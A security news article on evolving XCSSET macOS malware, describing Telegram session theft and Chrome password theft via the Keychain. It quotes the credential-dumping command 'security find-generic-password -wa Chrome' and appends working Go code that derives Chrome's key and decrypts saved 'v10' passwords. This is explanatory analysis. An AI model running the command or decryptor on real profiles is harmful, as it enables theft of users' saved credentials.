XCSSET macOS malware continues to evolve, now it is able to steal login information from multiple apps, including Telegram and Google Chrome.

Security researchers from Trend Micro continue to monitor the evolution of the XCSSET macOS malware: new variants are able to steal login information from multiple apps, including Telegram and Google Chrome, and send it to the C2.

To target Telegram, the malware creates the archive "telegram.applescript" for the "keepcoder.Telegram" folder, which is located in the Group Containers folder ("~/Library/Group Containers/.keepcoder.Telegram").

Experts pointed out that the XCSSET malware can steal sensitive data using this technique because normal users can access the Application sandbox directory with read/write permissions. Attackers can then copy the stolen folder to another machine with Telegram installed and act on behalf of the legitimate owner of the account.

"On macOS, the Application sandbox directory ~/Library/Containers/ and ~/Library/Group Containers/ can be accessed (with READ/WRITE permissions) by common users. Not all executable files are sandboxed on macOS, which means a simple script can steal all the data stored in the sandbox directory." reads the analysis published by Trend Micro. "We recommend that application developers refrain from storing sensitive data in the sandbox directory, particularly those related to login information."

Trend Micro also provides details about the technique used by the XCSSET malware to steal passwords from Google Chrome using the Safe Storage Key, which is stored in the Keychain item "Chrome Safe Storage."

"XCSSET gets the safe_storage_key using the command security find-generic-password -wa 'Chrome', which requires root privileges. Then the malware puts all the operations that need root privilege together in a single function. The user is then prompted to grant these privileges via a fake dialog box. Once it has obtained the Chrome safe_storage_key, it decrypts all the sensitive data and uploads it to the C&C server." states the report.
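Why the Keychain item alone is enough to read a copied Login Data file, as an added example in Go (not code from the Trend Micro report or from XCSSET): on macOS, Chrome's os_crypt stretches the "Chrome Safe Storage" password string with PBKDF2-HMAC-SHA1 (salt "saltysalt", 1003 iterations) into an AES-128 key and stores each secret as the prefix "v10" followed by AES-128-CBC ciphertext under a fixed IV of 16 ASCII spaces. The example derives that key and decrypts a value of that shape. The Keychain string and the password it protects are constructed sample values, and the function and constant names are this example's own; PBKDF2 is written out so the block needs nothing outside the standard library.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/hmac"
	"crypto/sha1"
	"encoding/binary"
	"errors"
)

// Parameters from Chrome's os_crypt on macOS: the Keychain item "Chrome Safe
// Storage" becomes an AES-128 key; each value is "v10" + AES-CBC under a fixed IV.
const (
	chromeSalt       = "saltysalt"
	chromeIterations = 1003
	chromeKeyLen     = 16
	chromeV10Prefix  = "v10"
)

var chromeIV = bytes.Repeat([]byte{' '}, aes.BlockSize) // 16 ASCII spaces

// pbkdf2SHA1 is a minimal PBKDF2-HMAC-SHA1 (RFC 8018) using only the standard library.
func pbkdf2SHA1(password, salt []byte, iter, keyLen int) []byte {
	prf := hmac.New(sha1.New, password)
	idx := make([]byte, 4)
	var out []byte
	for block := 1; len(out) < keyLen; block++ {
		prf.Reset()
		prf.Write(salt)
		binary.BigEndian.PutUint32(idx, uint32(block))
		prf.Write(idx)
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for n := 1; n < iter; n++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for i := range t {
				t[i] ^= u[i]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// DeriveChromeKey turns the Keychain password string (what
// `security find-generic-password -wa 'Chrome'` prints) into the AES key.
func DeriveChromeKey(safeStorageKey string) []byte {
	return pbkdf2SHA1([]byte(safeStorageKey), []byte(chromeSalt), chromeIterations, chromeKeyLen)
}

// DecryptV10 decrypts one stored value, e.g. password_value from Login Data.
// A key from another Keychain almost always fails the PKCS#7 padding check.
func DecryptV10(key, blob []byte) (string, error) {
	if !bytes.HasPrefix(blob, []byte(chromeV10Prefix)) {
		return "", errors.New("not a v10 value")
	}
	ct := blob[len(chromeV10Prefix):]
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return "", errors.New("ciphertext length is not a multiple of the block size")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, chromeIV).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1]) // PKCS#7: the last byte gives the padding length
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad PKCS#7 padding")
	}
	return string(pt[:len(pt)-pad]), nil
}

// EncryptV10 builds a value the same way Chrome does. It exists here only to
// construct an offline sample; no real Login Data is embedded.
func EncryptV10(key []byte, plaintext string) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, chromeIV).CryptBlocks(ct, padded)
	return append([]byte(chromeV10Prefix), ct...), nil
}

// Constructed sample values (not a real Keychain key or saved password), so
// the round trip runs offline: DecryptV10(SampleKey, SampleBlob) == "hunter2".
var (
	SampleKey     = DeriveChromeKey("c2FtcGxlU2FmZVN0b3JhZ2VLZXk=")
	SampleBlob, _ = EncryptV10(SampleKey, "hunter2")
)
```

Against a live profile the input to DecryptV10 would be the password_value column read from a copy of Login Data, and the key would come from the report's security command; the example constructs its own blob instead so that it runs offline. Two properties matter for a practitioner: the scheme is deterministic (same key, same plaintext, same fixed IV gives the same blob), and values without the "v10" prefix are rejected rather than decrypted with the Keychain-derived key.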